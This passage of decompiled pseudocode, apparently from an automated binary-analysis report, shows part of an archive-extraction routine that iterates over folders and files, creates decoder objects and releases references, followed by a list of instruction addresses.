						 *((intOrPtr*)(_t959 - 0x84)) = 0x47ab08;
						 *(_t959 - 4) = 9;
						 *(_t959 - 0x44) = 0;
						while(1) {
							L43:
							_t548 =  *(_t959 - 0x44);
							__eflags = _t548 -  *((intOrPtr*)(_t959 + 0x10));
							if(_t548 >=  *((intOrPtr*)(_t959 + 0x10))) {
								break;
							}
							__eflags =  *((char*)(_t959 - 0x21));
							if( *((char*)(_t959 - 0x21)) == 0) {
								_t947 =  *( *((intOrPtr*)(_t959 + 0xc)) +  *(_t959 - 0x44) * 4);
							} else {
								_t947 = _t548;
							}
							_t938 =  *((intOrPtr*)(_t959 + 8));
							 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
							_t801 =  *((intOrPtr*)(_t938 + 0x28)) + _t947 * 8;
							 *(_t959 - 0xa0) = _t801;
							_t776 =  *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *_t801 * 4));
							_t560 =  *( *((intOrPtr*)(_t776 + 0x70)) + _t801[1] * 4);
							 *(_t959 - 0x48) = _t560;
							_t562 =  *(_t560 + 0x1c) >> 4;
							__eflags = _t562 & 0x00000001;
							if((_t562 & 0x00000001) == 0) {
								_t563 = E00434147(_t938 + 8, _t801);
								__eflags = _t563;
								 *(_t959 - 0x54) = _t563;
								if(_t563 >= 0) {
									_t565 =  *( *((intOrPtr*)(_t938 + 0x50)) +  *(_t959 - 0x54) * 4);
									 *(_t959 - 0x60) = _t565;
									 *(_t959 + 0x14) = _t565;
									E0040862D();
									while(1) {
										__eflags =  *(_t959 + 0x14) - _t947;
										if( *(_t959 + 0x14) >= _t947) {
											break;
										}
										E0043AC2F(_t959 - 0x84, 0);
										 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									}
									E0043AC2F(_t959 - 0x84, 1);
									 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									_t569 =  *((intOrPtr*)( *(_t959 - 0x48) + 0x10)) +  *((intOrPtr*)( *(_t959 - 0x48) + 0xc));
									__eflags = _t569;
									asm("adc ecx, esi");
									 *(_t959 - 0x68) = _t569;
									 *((intOrPtr*)(_t959 - 0x64)) = 0;
									while(1) {
										_t570 =  *(_t959 - 0x44);
										__eflags = _t570 -  *((intOrPtr*)(_t959 + 0x10));
										if(_t570 >=  *((intOrPtr*)(_t959 + 0x10))) {
											break;
										}
										__eflags =  *((char*)(_t959 - 0x21));
										if( *((char*)(_t959 - 0x21)) == 0) {
											_t570 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t570 * 4);
										}
										 *(_t959 - 0x4c) = _t570;
										_t722 =  *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8;
										_t956 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8)[1] * 4));
										_t890 =  *(_t956 + 0x1c) >> 4;
										__eflags = _t890 & 0x00000001;
										if((_t890 & 0x00000001) != 0) {
											L90:
											 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
											continue;
										} else {
											_t723 = E00434147(_t938 + 8, _t722);
											__eflags = _t723 -  *(_t959 - 0x54);
											if(_t723 !=  *(_t959 - 0x54)) {
												break;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags =  *(_t959 + 0x14) -  *(_t959 - 0x4c);
												if( *(_t959 + 0x14) >=  *(_t959 - 0x4c)) {
													break;
												}
												E0043AC2F(_t959 - 0x84, 0);
												 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											}
											E0043AC2F(_t959 - 0x84, 1);
											 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											_t727 =  *((intOrPtr*)(_t956 + 0x10)) +  *((intOrPtr*)(_t956 + 0xc));
											__eflags = _t727;
											asm("adc ecx, esi");
											 *(_t959 - 0x68) = _t727;
											 *((intOrPtr*)(_t959 - 0x64)) = 0;
											goto L90;
										}
									}
									_t807 =  *(_t959 - 0x98);
									 *(_t807 + 0x28) =  *(_t959 - 0x3c);
									 *(_t807 + 0x2c) =  *(_t959 - 0x38);
									 *((intOrPtr*)(_t807 + 0x20)) =  *((intOrPtr*)(_t959 - 0x8c));
									 *((intOrPtr*)(_t807 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
									_t949 = E0040F554(_t807);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L52;
									}
									_push(0x50);
									_t589 = E004079F2();
									__eflags = _t589;
									if(_t589 == 0) {
										_t939 = 0;
										__eflags = 0;
									} else {
										_t939 = _t589;
										 *((intOrPtr*)(_t589 + 4)) = 0;
										 *((intOrPtr*)(_t589 + 0x10)) = 0;
										 *((intOrPtr*)(_t589 + 0x2c)) = 0;
										 *((intOrPtr*)(_t589 + 0x34)) = 0;
										 *_t589 = 0x47b460;
									}
									__eflags = _t939;
									 *(_t959 - 0x34) = _t939;
									if(_t939 != 0) {
										 *((intOrPtr*)( *_t939 + 4))(_t939);
									}
									 *(_t959 - 4) = 0xc;
									_t950 =  *((intOrPtr*)( *((intOrPtr*)(_t776 + 0x5c)) + E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58))) * 4));
									E00434705(_t939,  *((intOrPtr*)(_t959 + 8)) + 8, _t959 - 0x84,  *(_t959 - 0x60),  *(_t959 - 0x68),  *((intOrPtr*)(_t959 - 0x64)),  *((intOrPtr*)(_t959 + 0x18)),  *(_t959 - 0x90));
									 *( *(_t959 - 0x50) + 0x21) =  *( *(_t959 - 0x50) + 0x21) & 0x00000000;
									_t598 =  *(_t950 + 6) & 0x0000000f;
									__eflags = _t598;
									if(_t598 == 0) {
										L124:
										 *((intOrPtr*)( *(_t959 - 0x50) + 0x18)) = 0;
										 *(_t959 - 0x40) = 0;
										 *(_t959 - 0x4c) =  *( *(_t959 - 0xa0));
										_t602 = E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58)));
										 *(_t959 + 0x17) =  *(_t959 + 0x17) & 0x00000000;
										_t324 = _t959 - 0x2d;
										 *_t324 =  *(_t959 - 0x2d) & 0x00000000;
										__eflags =  *_t324;
										 *(_t959 - 0x60) = _t602;
										 *(_t959 - 0x48) = 0;
										while(1) {
											asm("sbb ecx, [edi+0x4c]");
											__eflags =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44);
											if(( *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44)) == 0) {
												break;
											}
											_t833 =  *((intOrPtr*)(_t959 + 8));
											__eflags =  *(_t959 - 0x4c) -  *((intOrPtr*)(_t833 + 0x10));
											if( *(_t959 - 0x4c) >=  *((intOrPtr*)(_t833 + 0x10))) {
												L200:
												_t949 = E00434C64(_t939);
												__eflags = _t949;
												if(_t949 == 0) {
													L203:
													 *(_t959 - 0x3c) =  *(_t959 - 0x3c) +  *(_t959 - 0x68);
													 *(_t959 - 4) = 9;
													asm("adc [ebp-0x38], eax");
													E0043361B(_t959 - 0x34);
													goto L43;
												}
												L201:
												 *(_t959 - 4) = 9;
												E0043361B(_t959 - 0x34);
												 *(_t959 - 4) = 8;
												E00408604(_t959 - 0x84);
												 *(_t959 - 4) = 6;
												E0043361B(_t959 - 0x14);
												 *(_t959 - 4) = 5;
												E0043361B(_t959 - 0x18);
												 *(_t959 - 4) = 4;
												E0043361B(_t959 - 0x1c);
												 *(_t959 - 4) = 3;
												E0043361B(_t959 - 0x20);
												 *(_t959 - 4) = 2;
												E0043361B(_t959 - 0x28);
												_t512 = _t959 - 4;
												 *_t512 =  *(_t959 - 4) & 0x00000000;
												__eflags =  *_t512;
												E0043361B(_t959 - 0x2c);
												goto L202;
											}
											__eflags =  *(_t959 - 0x48);
											_t952 =  *((intOrPtr*)( *((intOrPtr*)(_t833 + 0x14)) +  *(_t959 - 0x4c) * 4));
											 *(_t959 - 0x54) =  *( *((intOrPtr*)(_t952 + 0x5c)) +  *(_t959 - 0x60) * 4);
											if( *(_t959 - 0x48) != 0) {
												L133:
												_t627 =  *(_t959 - 0x54);
												_t836 =  *(_t959 - 0x50);
												__eflags =  *(_t959 - 0x48) - ( *(_t627 + 4) & 0x0000ffff);
												if( *(_t959 - 0x48) != ( *(_t627 + 4) & 0x0000ffff)) {
													 *(_t959 - 0x48) =  *(_t959 - 0x48) + 1;
													 *(_t836 + 0x20) =  *(_t836 + 0x20) & 0x00000000;
													__eflags =  *(_t959 - 0x2d);
													if(__eflags == 0) {
														_t372 = _t836 + 0x14;
														 *_t372 =  *(_t836 + 0x14) & 0x00000000;
														__eflags =  *_t372;
													}
													_t631 = E00433AD8(_t836, __eflags, _t959 - 0xa4, _t959 - 0x9c);
													__eflags = _t631 - 1;
													 *(_t959 - 0x40) = _t631;
													if(_t631 == 1) {
														break;
													} else {
														__eflags = _t631;
														if(_t631 == 0) {
															__eflags =  *(_t959 - 0x9c);
															 *(_t959 - 0x2d) =  *(_t959 - 0x9c) == 0;
															__eflags =  *(_t959 - 0x2d);
															if( *(_t959 - 0x2d) != 0) {
																continue;
															}
															_t925 =  *(_t959 - 0x98);
															asm("adc ecx, [ebp-0x38]");
															_t954 =  *((intOrPtr*)(_t959 - 0x8c)) +  *((intOrPtr*)(_t959 - 0xa4));
															_t779 = 0;
															 *((intOrPtr*)(_t925 + 0x28)) =  *((intOrPtr*)(_t939 + 0x48)) +  *(_t959 - 0x3c);
															asm("adc [ebp-0x88], ebx");
															 *((intOrPtr*)(_t925 + 0x2c)) =  *((intOrPtr*)(_t939 + 0x4c));
															 *((intOrPtr*)(_t925 + 0x20)) = _t954;
															 *((intOrPtr*)(_t959 - 0x8c)) = _t954;
															 *((intOrPtr*)(_t925 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
															_t949 = E0040F554(_t925);
															__eflags = _t949 - _t779;
															if(_t949 == _t779) {
																_t636 =  *(_t939 + 0x44);
																_t840 =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48));
																__eflags = _t840;
																asm("sbb eax, [edi+0x4c]");
																 *(_t959 - 0x70) = _t840;
																 *(_t959 - 0x6c) = _t636;
																if(_t840 != 0) {
																	L170:
																	_t840 = 0x8000;
																	_t636 = 0;
																	__eflags = 0;
																	 *(_t959 - 0x70) = 0x8000;
																	 *(_t959 - 0x6c) = 0;
																	L171:
																	_t926 =  *(_t959 - 0x9c);
																	__eflags = _t636;
																	if(__eflags < 0) {
																		L175:
																		_t640 = ( *( *(_t959 - 0x54) + 6) & 0x0000000f) - _t779;
																		__eflags = _t640;
																		if(_t640 == 0) {
																			_t641 =  *(_t959 - 0x28);
																			L183:
																			 *(_t959 - 0x40) =  *((intOrPtr*)( *_t641 + 0xc))(_t641,  *(_t959 - 0x14),  *(_t959 - 0x34), _t779, _t959 - 0x70, _t779);
																			L184:
																			__eflags =  *(_t959 - 0x40) - _t779;
																			if( *(_t959 - 0x40) == _t779) {
																				 *(_t959 + 0x17) = 1;
																				continue;
																			}
																			__eflags =  *(_t959 - 0x40) - 1;
																			if( *(_t959 - 0x40) == 1) {
																				goto L200;
																			}
																			_t643 =  *(_t959 - 0x34);
																			 *(_t959 - 4) = 9;
																			__eflags = _t643;
																			if(_t643 != 0) {
																				 *((intOrPtr*)( *_t643 + 8))(_t643);
																			}
																			 *(_t959 - 4) = 8;
																			E00408604(_t959 - 0x84);
																			_t645 =  *(_t959 - 0x14);
																			 *(_t959 - 4) = 6;
																			__eflags = _t645;
																			if(_t645 != 0) {
																				 *((intOrPtr*)( *_t645 + 8))(_t645);
																			}
																			_t646 =  *(_t959 - 0x18);
																			 *(_t959 - 4) = 5;
																			__eflags = _t646;
																			if(_t646 != 0) {
																				 *((intOrPtr*)( *_t646 + 8))(_t646);
																			}
																			_t647 =  *(_t959 - 0x1c);
																			 *(_t959 - 4) = 4;
																			__eflags = _t647;
																			if(_t647 != 0) {
																				 *((intOrPtr*)( *_t647 + 8))(_t647);
																			}
																			 *(_t959 - 4) = 3;
																			E0043361B(_t959 - 0x20);
																			 *(_t959 - 4) = 2;
																			E0043361B(_t959 - 0x28);
																			_t489 = _t959 - 4;
																			 *_t489 =  *(_t959 - 4) & 0x00000000;
																			__eflags =  *_t489;
																			E0043361B(_t959 - 0x2c);
																			L195:
																			_t538 =  *(_t959 - 0x40);
																			goto L41;
																		}
																		_t655 = _t640 - 1;
																		__eflags = _t655;
																		if(_t655 == 0) {
																			 *((char*)( *(_t959 - 0x94) + 0xd52)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x20);
																			goto L183;
																		}
																		_t657 = _t655 - 1;
																		__eflags = _t657;
																		if(_t657 == 0) {
																			 *((char*)( *(_t959 - 0x5c) + 0x84)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x18);
																			goto L183;
																		}
																		__eflags = _t657 != 1;
																		if(_t657 != 1) {
																			goto L184;
																		}
																		 *((char*)( *(_t959 - 0x58) + 0x1cb8)) =  *(_t959 + 0x17);
																		_t641 =  *(_t959 - 0x1c);
																		goto L183;
																	}
																	if(__eflags > 0) {
																		L174:
																		 *(_t959 - 0x70) = _t926;
																		 *(_t959 - 0x6c) = 0;
																		goto L175;
																	}
																	__eflags = _t840 - _t926;
																	if(_t840 <= _t926) {
																		goto L175;
																	}
																	goto L174;
																}
																__eflags = _t840 - 0x8000;
																if(_t840 <= 0x8000) {
																	goto L171;
																}
																goto L170;
															}
															_t661 =  *(_t959 - 0x34);
															 *(_t959 - 4) = 9;
															__eflags = _t661 - _t779;
															if(_t661 != _t779) {
																 *((intOrPtr*)( *_t661 + 8))(_t661);
															}
															 *(_t959 - 4) = 8;
															E00408604(_t959 - 0x84);
															_t663 =  *(_t959 - 0x14);
															 *(_t959 - 4) = 6;
															__eflags = _t663 - _t779;
															if(_t663 != _t779) {
																 *((intOrPtr*)( *_t663 + 8))(_t663);
															}
															_t664 =  *(_t959 - 0x18);
															 *(_t959 - 4) = 5;
															__eflags = _t664 - _t779;
															if(_t664 != _t779) {
																 *((intOrPtr*)( *_t664 + 8))(_t664);
															}
															_t665 =  *(_t959 - 0x1c);
															 *(_t959 - 4) = 4;
															__eflags = _t665 - _t779;
															if(_t665 != _t779) {
																 *((intOrPtr*)( *_t665 + 8))(_t665);
															}
															_t666 =  *(_t959 - 0x20);
															 *(_t959 - 4) = 3;
															__eflags = _t666 - _t779;
															if(_t666 != _t779) {
																 *((intOrPtr*)( *_t666 + 8))(_t666);
															}
															_t667 =  *(_t959 - 0x28);
															 *(_t959 - 4) = 2;
															__eflags = _t667 - _t779;
															if(_t667 != _t779) {
																 *((intOrPtr*)( *_t667 + 8))(_t667);
															}
															_t582 =  *(_t959 - 0x2c);
															 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
															__eflags = _t582 - _t779;
															goto L63;
														}
														_t674 =  *(_t959 - 0x34);
														 *(_t959 - 4) = 9;
														__eflags = _t674;
														if(_t674 != 0) {
															 *((intOrPtr*)( *_t674 + 8))(_t674);
														}
														 *(_t959 - 4) = 8;
														E00408604(_t959 - 0x84);
														_t676 =  *(_t959 - 0x14);
														 *(_t959 - 4) = 6;
														__eflags = _t676;
														if(_t676 != 0) {
															 *((intOrPtr*)( *_t676 + 8))(_t676);
														}
														_t677 =  *(_t959 - 0x18);
														 *(_t959 - 4) = 5;
														__eflags = _t677;
														if(_t677 != 0) {
															 *((intOrPtr*)( *_t677 + 8))(_t677);
														}
														_t678 =  *(_t959 - 0x1c);
														 *(_t959 - 4) = 4;
														__eflags = _t678;
														if(_t678 != 0) {
															 *((intOrPtr*)( *_t678 + 8))(_t678);
														}
														_t679 =  *(_t959 - 0x20);
														 *(_t959 - 4) = 3;
														__eflags = _t679;
														if(_t679 != 0) {
															 *((intOrPtr*)( *_t679 + 8))(_t679);
														}
														_t680 =  *(_t959 - 0x28);
														 *(_t959 - 4) = 2;
														__eflags = _t680;
														if(_t680 != 0) {
															 *((intOrPtr*)( *_t680 + 8))(_t680);
														}
														_t681 =  *(_t959 - 0x2c);
														 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
														__eflags = _t681;
														if(_t681 != 0) {
															 *((intOrPtr*)( *_t681 + 8))(_t681);
														}
														goto L195;
													}
												}
												 *(_t959 - 0x4c) =  *(_t959 - 0x4c) + 1;
												 *(_t959 - 0x60) =  *(_t959 - 0x60) & 0x00000000;
												 *(_t959 - 0x48) =  *(_t959 - 0x48) & 0x00000000;
												continue;
											}
											_t777 =  *(_t959 - 0x50);
											E0040C9B4(_t777 + 8,  *((intOrPtr*)(_t952 + 0x78)));
											_t691 =  *(_t952 + 0xe) >> 2;
											__eflags = _t691 & 0x00000001;
											if((_t691 & 0x00000001) == 0) {
												_t692 = 0;
												__eflags = 0;
											} else {
												_t692 =  *(_t952 + 0x17) & 0x000000ff;
											}
											 *(_t777 + 0x1c) = _t692 & 0x000000ff;
											_t694 =  *((intOrPtr*)(_t952 + 0x78));
											asm("adc ebx, [esi+0x4]");
											_t949 =  *((intOrPtr*)( *_t694 + 0x10))(_t694,  *( *(_t959 - 0x54)) +  *_t952, 0, 0, 0);
											__eflags = _t949;
											if(_t949 == 0) {
												goto L133;
											} else {
												goto L132;
											}
										}
										__eflags =  *(_t959 - 0x40);
										if( *(_t959 - 0x40) != 0) {
											goto L200;
										}
										_t949 = E004349A7(_t939);
										__eflags = _t949;
										if(_t949 != 0) {
											goto L201;
										}
										asm("sbb ecx, [edi+0x4c]");
										__eflags =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44);
										if(( *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44)) == 0) {
											goto L203;
										}
										goto L200;
									} else {
										_t698 = _t598 - 1;
										__eflags = _t698;
										if(_t698 == 0) {
											__eflags =  *(_t959 - 0x94);
											if( *(_t959 - 0x94) == 0) {
												_push(0xd68);
												_t872 = E004079F2();
												 *(_t959 + 0x14) = _t872;
												__eflags = _t872;
												 *(_t959 - 4) = 0xd;
												if(_t872 == 0) {
													_t701 = 0;
													__eflags = 0;
												} else {
													_t701 = E0041F0B9(_t872);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x94) = _t701;
												E0040C9B4(_t959 - 0x20, _t701);
											}
											 *( *(_t959 - 0x50) + 0x21) = 1;
											goto L124;
										}
										_t703 = _t698 - 1;
										__eflags = _t703;
										if(_t703 == 0) {
											__eflags =  *(_t959 - 0x5c);
											if( *(_t959 - 0x5c) == 0) {
												_push(0x7b8);
												_t876 = E004079F2();
												 *(_t959 + 0x14) = _t876;
												__eflags = _t876;
												 *(_t959 - 4) = 0xf;
												if(__eflags == 0) {
													_t706 = 0;
													__eflags = 0;
												} else {
													_t706 = E004358FF(_t876, __eflags);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x5c) = _t706;
												E0040C9B4(_t959 - 0x18, _t706);
											}
											 *( *(_t959 - 0x5c) + 0x80) =  *(_t950 + 7) & 0x000000ff;
											goto L124;
										}
										__eflags = _t703 == 1;
										if(_t703 == 1) {
											__eflags =  *(_t959 - 0x58);
											if( *(_t959 - 0x58) == 0) {
												_push(0x1cc8);
												_t880 = E004079F2();
												 *(_t959 + 0x14) = _t880;
												__eflags = _t880;
												 *(_t959 - 4) = 0xe;
												if(__eflags == 0) {
													_t712 = 0;
													__eflags = 0;
												} else {
													_t712 = E00450870(_t880, __eflags, 0);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x58) = _t712;
												E0040C9B4(_t959 - 0x1c, _t712);
											}
											_t949 = E00451F20( *(_t959 - 0x58),  *(_t950 + 7) & 0x000000ff);
											__eflags = _t949;
											if(_t949 == 0) {
												goto L124;
											} else {
												L132:
												_t696 =  *(_t959 - 0x34);
												 *(_t959 - 4) = 9;
												goto L50;
											}
										}
										_t949 = E00434CD8(_t939);
										__eflags = _t949;
										if(_t949 != 0) {
											goto L132;
										}
										 *(_t959 - 4) = 9;
										_t285 = _t959 - 0x3c;
										 *_t285 =  *(_t959 - 0x3c) +  *(_t959 - 0x68);
										__eflags =  *_t285;
										asm("adc [ebp-0x38], eax");
										_t717 =  *(_t959 - 0x34);
										goto L103;
									}
								}
								__eflags =  *(_t959 - 0x90);
								_t781 = 0 |  *(_t959 - 0x90) != 0x00000000;
								 *(_t959 + 0x14) =  *(_t959 + 0x14) & 0x00000000;
								_t940 =  *((intOrPtr*)(_t959 + 0x18));
								 *(_t959 - 4) = 0xb;
								_t949 =  *((intOrPtr*)( *_t940 + 0x14))(_t940, _t947, _t959 + 0x14, _t781);
								__eflags = _t949;
								if(_t949 != 0) {
									L72:
									_t696 =  *(_t959 + 0x14);
									 *(_t959 - 4) = 9;
									goto L50;
								}
								_t949 =  *((intOrPtr*)( *_t940 + 0x18))(_t940, _t781);
								__eflags = _t949;
								if(_t949 == 0) {
									_t734 =  *(_t959 + 0x14);
									__eflags = _t734;
									if(_t734 != 0) {
										 *((intOrPtr*)( *_t734 + 8))(_t734);
										_t190 = _t959 + 0x14;
										 *_t190 =  *(_t959 + 0x14) & 0x00000000;
										__eflags =  *_t190;
									}
									_t949 =  *((intOrPtr*)( *_t940 + 0x1c))(_t940, 2);
									_t717 =  *(_t959 + 0x14);
									__eflags = _t949;
									 *(_t959 - 4) = 9;
									goto L76;
								}
								goto L72;
							} else {
								__eflags =  *(_t959 - 0x90);
								_t783 = 0 |  *(_t959 - 0x90) != 0x00000000;
								 *(_t959 + 0x14) =  *(_t959 + 0x14) & 0x00000000;
								_t941 =  *((intOrPtr*)(_t959 + 0x18));
								 *(_t959 - 4) = 0xa;
								_t949 =  *((intOrPtr*)( *_t941 + 0x14))(_t941, _t947, _t959 + 0x14, _t783);
								__eflags = _t949;
								if(_t949 == 0) {
									_t949 =  *((intOrPtr*)( *_t941 + 0x18))(_t941, _t783);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L49;
									}
									_t742 =  *(_t959 + 0x14);
									__eflags = _t742;
									if(_t742 != 0) {
										 *((intOrPtr*)( *_t742 + 8))(_t742);
										_t169 = _t959 + 0x14;
										 *_t169 =  *(_t959 + 0x14) & _t949;
										__eflags =  *_t169;
									}
									_t949 =  *((intOrPtr*)( *_t941 + 0x1c))(_t941, 0);
									_t717 =  *(_t959 + 0x14);
									__eflags = _t949;
									 *(_t959 - 4) = 9;
									L76:
									if(__eflags == 0) {
										L103:
										__eflags = _t717;
										if(_t717 != 0) {
											 *((intOrPtr*)( *_t717 + 8))(_t717);
										}
										continue;
									}
									L50:
									__eflags = _t696;
									if(_t696 != 0) {
										 *((intOrPtr*)( *_t696 + 8))(_t696);
									}
									L52:
									 *(_t959 - 4) = 8;
									E00408604(_t959 - 0x84);
									_t577 =  *(_t959 - 0x14);
									 *(_t959 - 4) = 6;
									__eflags = _t577;
									if(_t577 != 0) {
										 *((intOrPtr*)( *_t577 + 8))(_t577);
									}
									_t578 =  *(_t959 - 0x18);
									 *(_t959 - 4) = 5;
									__eflags = _t578;
									if(_t578 != 0) {
										 *((intOrPtr*)( *_t578 + 8))(_t578);
									}
									_t579 =  *(_t959 - 0x1c);
									 *(_t959 - 4) = 4;
									__eflags = _t579;
									if(_t579 != 0) {
										 *((intOrPtr*)( *_t579 + 8))(_t579);
									}
									_t580 =  *(_t959 - 0x20);
									 *(_t959 - 4) = 3;
									__eflags = _t580;
									if(_t580 != 0) {
										 *((intOrPtr*)( *_t580 + 8))(_t580);
									}
									_t581 =  *(_t959 - 0x28);
									 *(_t959 - 4) = 2;
									__eflags = _t581;
									if(_t581 != 0) {
										 *((intOrPtr*)( *_t581 + 8))(_t581);
									}
									_t582 =  *(_t959 - 0x2c);
									 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
									__eflags = _t582;
									L63:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t582 + 8))(_t582);
									}
									L202:
									_t538 = _t949;
									goto L41;
								}
								L49:
								_t696 =  *(_t959 + 0x14);
								 *(_t959 - 4) = 9;
								goto L50;
							}
						}
						 *(_t959 - 4) = 8;
						E00408604(_t959 - 0x84);
						 *(_t959 - 4) = 6;
						E0043361B(_t959 - 0x14);
						 *(_t959 - 4) = 5;
						E0043361B(_t959 - 0x18);
						 *(_t959 - 4) = 4;
						E0043361B(_t959 - 0x1c);
						 *(_t959 - 4) = 3;
						E0043361B(_t959 - 0x20);
						 *(_t959 - 4) = 2;
						E0043361B(_t959 - 0x28);
						_t533 = _t959 - 4;
						 *_t533 =  *(_t959 - 4) & 0x00000000;
						__eflags =  *_t533;
						E0043361B(_t959 - 0x2c);
						goto L205;
					} else {
						_t746 =  *(_t959 - 0x14);
						 *(_t959 - 4) = 6;
						__eflags = _t746;
						if(_t746 != 0) {
							 *((intOrPtr*)( *_t746 + 8))(_t746);
						}
						_t747 =  *(_t959 - 0x18);
						 *(_t959 - 4) = 5;
						__eflags = _t747;
						if(_t747 != 0) {
							 *((intOrPtr*)( *_t747 + 8))(_t747);
						}
						_t748 =  *(_t959 - 0x1c);
						 *(_t959 - 4) = 4;
						__eflags = _t748;
						if(_t748 != 0) {
							 *((intOrPtr*)( *_t748 + 8))(_t748);
						}
						_t749 =  *(_t959 - 0x20);
						 *(_t959 - 4) = 3;
						__eflags = _t749;
						if(_t749 != 0) {
							 *((intOrPtr*)( *_t749 + 8))(_t749);
						}
						_t750 =  *(_t959 - 0x28);
						 *(_t959 - 4) = 2;
						__eflags = _t750;
						if(_t750 != 0) {
							 *((intOrPtr*)( *_t750 + 8))(_t750);
						}
						_t751 =  *(_t959 - 0x2c);
						 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
						__eflags = _t751;
						if(_t751 != 0) {
							 *((intOrPtr*)( *_t751 + 8))(_t751);
						}
						_t538 = 0x8007000e;
						L41:
						 *[fs:0x0] =  *((intOrPtr*)(_t959 - 0xc));
						return _t538;
					}
				}
			}








































































































                                                                      0x00434d2d
                                                                      0x00434d3b
                                                                      0x00434d41
                                                                      0x00434d44
                                                                      0x00434d47
                                                                      0x00434d4f
                                                                      0x00434d57
                                                                      0x00434d57
                                                                      0x00434d5d
                                                                      0x004358f2
                                                                      0x004358f2
                                                                      0x00000000
                                                                      0x00434d63
                                                                      0x00434d66
                                                                      0x00434d69
                                                                      0x00434d6c
                                                                      0x00434d73
                                                                      0x00434d7c
                                                                      0x00434d7e
                                                                      0x00434d81
                                                                      0x00434d84
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00434d8a
                                                                      0x00434d8f
                                                                      0x00434d8f
                                                                      0x00434d92
                                                                      0x00434d9b
                                                                      0x00434da9
                                                                      0x00434db5
                                                                      0x00434dbe
                                                                      0x00434dc6
                                                                      0x00434dc8
                                                                      0x00434dcb
                                                                      0x00434dcb
                                                                      0x00434dd1
                                                                      0x00434ddb
                                                                      0x00434ddd
                                                                      0x00434ddd
                                                                      0x00434de2
                                                                      0x00434de2
                                                                      0x00434de5
                                                                      0x00434de8
                                                                      0x00434deb
                                                                      0x00434df7
                                                                      0x00434dfc
                                                                      0x00434dfe
                                                                      0x00434e01
                                                                      0x00434e04
                                                                      0x00434e0a
                                                                      0x00434e16
                                                                      0x00434e18
                                                                      0x00434e1b
                                                                      0x00434e1d
                                                                      0x00434e21
                                                                      0x00434e2c
                                                                      0x00434e2c
                                                                      0x00434e23
                                                                      0x00434e28
                                                                      0x00434e28
                                                                      0x00434e2e
                                                                      0x00434e32
                                                                      0x00434e34
                                                                      0x00434e3a
                                                                      0x00434e3d
                                                                      0x00434e42
                                                                      0x00434e42
                                                                      0x00434e45
                                                                      0x00434e49
                                                                      0x00434e4d
                                                                      0x00434e52
                                                                      0x00434e54
                                                                      0x00434e59
                                                                      0x00434e5c
                                                                      0x00434e80
                                                                      0x00434e80
                                                                      0x00434e5e
                                                                      0x00434e5e
                                                                      0x00434e65
                                                                      0x00434e68
                                                                      0x00434e6b
                                                                      0x00434e6e
                                                                      0x00434e71
                                                                      0x00434e77
                                                                      0x00434e77
                                                                      0x00434e82
                                                                      0x00434e84
                                                                      0x00434e87
                                                                      0x00434e8c
                                                                      0x00434e8c
                                                                      0x00434e8f
                                                                      0x00434e95
                                                                      0x00434e98
                                                                      0x00434e9b
                                                                      0x00434e9e
                                                                      0x00434ea1
                                                                      0x00434ea4
                                                                      0x00434ea6
                                                                      0x00434eaa
                                                                      0x00434eb0
                                                                      0x00434eb3
                                                                      0x00434eb5
                                                                      0x00434eb9
                                                                      0x00434ec6
                                                                      0x00434ec6
                                                                      0x00434ebb
                                                                      0x00434ec2
                                                                      0x00434ec2
                                                                      0x00434ec8
                                                                      0x00434eca
                                                                      0x00434ecd
                                                                      0x00434ed1
                                                                      0x00434ed4
                                                                      0x00434ed9
                                                                      0x00434ed9
                                                                      0x00434ede
                                                                      0x00434ee2
                                                                      0x00434ee7
                                                                      0x00434ee9
                                                                      0x00434f6f
                                                                      0x00434f74
                                                                      0x00434f7e
                                                                      0x00434f82
                                                                      0x00434f85
                                                                      0x00434f85
                                                                      0x00434f85
                                                                      0x00434f88
                                                                      0x00434f8b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00434f91
                                                                      0x00434f95
                                                                      0x00434fa1
                                                                      0x00434f97
                                                                      0x00434f97
                                                                      0x00434f97
                                                                      0x00434fa4
                                                                      0x00434fa7
                                                                      0x00434fb0
                                                                      0x00434fb3
                                                                      0x00434fbb
                                                                      0x00434fc4
                                                                      0x00434fc7
                                                                      0x00434fcd
